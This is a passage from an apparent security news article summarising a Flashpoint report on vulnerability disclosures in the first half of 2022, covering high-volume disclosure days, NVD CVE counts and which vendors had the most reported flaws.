"Discovered-in-the-wild vulnerabilities are often used in high-profile breaches or are attributed to Advanced Persistent Threat (APT) attacks," the report states. "Due to their nature, organizations often lack defensive options for them. However, business leaders need to keep in mind that discovered-in-the-wild vulnerabilities represent a tiny fraction of compromises occurring around the world."

Organizations also had to deal with a growing number of days with hundreds of reported vulnerabilities because of software vendors' regularly scheduled updates. In February, for example, Flashpoint documented 351 issues thanks to releases from Microsoft's Patch Tuesday and disclosures from other software vendors falling on the same day. In April, a similar convergence of software-vulnerability disclosures saw the highest number of vulnerabilities, 356, released in a single day.

"Organizations need to be aware that the vulnerability disclosure landscape is highly volatile, with 'standard' days potentially introducing volumes traditionally seen only on Patch Tuesdays and other similar events," the Flashpoint report states.  

**Snowballing Levels of Vulnerability Disclosures**

The report also shows that the number of vulnerabilities disclosed to vendors continues to remain at high levels.

The National Vulnerability Database (NVD) also documented more than 11,000 flaws assigned Common Vulnerability and Exposures (CVE) identifiers in the first six months of the year. However, a fraction of those are not true reported vulnerabilities but vendors reserving CVE identifiers for future, or yet-to-be disclosed, vulnerabilities. Flashpoint estimates that its database has details on 27% more vulnerabilities than documented in the NVD.  

While various distributions of Linux topped the chart of vulnerable applications — such as SUSE, openSUSE Leap, and Ubuntu — open source–focused companies accounted for only four of the 10 vendors with the highest vulnerability counts in the first half of 2022. Yet high counts are not necessarily a sign of insecurity but are often a sign that the software company has a process in place to detect and remediate issues.

"There are many underlying reasons as to why certain products and vendors tend to have high vulnerability counts, such as overall market share, product-specific market share, routine — or lack of — schedule of disclosures, attention from vulnerability researchers, and vendor response/patch time, among others," the Flashpoint report states. "Therefore, organizations should not be immediately concerned about well-known vendors having 'more' vulnerabilities, as it could be a sign that they are actively disclosing and patching issues."

Tag

#apple